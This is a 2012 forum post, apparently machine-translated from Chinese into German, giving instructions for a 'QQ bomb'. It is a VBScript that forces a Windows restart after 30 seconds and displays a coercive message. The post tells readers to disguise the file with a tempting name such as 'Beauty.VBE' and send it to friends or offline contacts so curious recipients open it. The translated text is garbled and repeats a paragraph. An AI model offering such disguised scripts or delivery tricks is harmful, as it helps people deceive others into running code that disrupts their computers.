<Su hat geteilt>Um die Einführung des ¤Qingcheng¤-Positionssystems zu feiern, wird eine einfache Methode zur Herstellung von QQ-Bomben herausgegeben

Das Originalplakat: Qingcheng@Elder@SuHai Ansichten: 732 Antworten: 5 Gepostet in: 2012-06-03 01:04:01
Erklären Sie feierlich: Diese Methode dient ausschließlich der Unterhaltung. Bitte nutzen Sie es nicht für illegale Aktivitäten, sonst sind Sie für die Folgen verantwortlich! Kopieren Sie im ersten Schritt den folgenden Code in den Editor. bei Fehler fortsetzen nextdim WSHshellAset WSHshellA = wscript. createobject("wscript.shell") WSHshellA. run „cmd.exe /c Shutdown -r -t 30 -c „Sagen Sie mir schnell, dass 7723 das Beste ist. Wenn Sie es mir nicht sagen, fahre ich Ihren Computer in 30 Sekunden herunter. Wenn Sie mir nicht glauben, versuchen Sie es mit ***““ ist das Beste, beeilen Sie sich, sagen Sie „7723 ist das Beste“ „“, „Sagen Sie es oder sagen Sie es nicht“, „Sagen Sie es nicht“, 8000, 7000) msgbox chr (13) chr (13) chr (13) a, 0, „MsgBox“ Der Text über der Schleife kann nach Belieben und ohne Eindruck geändert werden. Wenn Sie es an MM senden, können Sie sie zwingen, „Ich liebe dich“ zu sagen. Die Methode besteht darin, dass der obige 7723 nach Belieben geändert werden kann, ohne die Wirkung zu beeinträchtigen. Der zweite Schritt besteht darin, die Notepad-Datei in *** umzubenennen. Es wurde eine einfache QQ-Bombe wie VBE erstellt (der Dateiname kann beliebig sein, z. B. „Beauty. VBE“). Wenn jemand diese QQ-Bombe startet, wird sie nach 30 Sekunden automatisch ausgeschaltet. Lassen Sie uns über die Verwendung sprechen: Der einfachste Weg, es zu verwenden, besteht darin, es direkt an Ihren Freund zu senden und ihn ausführen zu lassen. Dann wird er ausgetrickst. Es gibt noch etwas Schlimmeres. Sie können QQ-Offline-Dateien an QQ-Freunde senden, die nicht online sind. Fast 80 % der Menschen werden neugierig sein, was diese Datei ist, und sie verwirrt öffnen. Nachdem Sie es geöffnet haben, wird Ihnen die QQ-Bombe einen Streich spielen. Sie können auch die Kraft dieser QQ-Bombe testen. Der zweite Schritt besteht darin, die Notepad-Datei in *** umzubenennen. Es wurde eine einfache QQ-Bombe wie VBE erstellt (der Dateiname kann beliebig sein, z. B. „Beauty. VBE“). Wenn jemand diese QQ-Bombe startet, wird sie nach 30 Sekunden automatisch ausgeschaltet. Sie können die Kraft dieser QQ-Bombe auch selbst testen. Denken Sie nach dem Lernen daran, zu antworten. (Wenn die andere Partei es Ihnen sendet, geben Sie Shutdown -a ein, um es zu knacken).
Antwort 🤍 0 📤 Aktie sammeln
Sofa-Bruder hat sich hingesetzt
Nicht verstanden..
Ich wusste es schon lange, aber ich habe es mit E-Sprache geschrieben.
Ähm... wie findet man die Notizdatei? Und kann sie dem Handy schaden?
Guter Beitrag..
— Alle Antworten geladen —

Hinterlassen Sie eine Antwort